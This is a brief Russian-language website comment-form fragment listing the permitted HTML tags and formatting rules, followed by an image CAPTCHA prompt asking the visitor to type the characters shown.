  • Разрешённые HTML-теги: <img> <a> <em> <i> <strong> <b> <u> <strike> <p> <br> <ul> <ol> <li> <div> <blockquote>
  • Строки и параграфы переносятся автоматически.

Подробнее о форматировании текста

CAPTCHA
Проверка, что Вы не робот
CAPTCHA на основе изображений
Введите символы, которые показаны на картинке.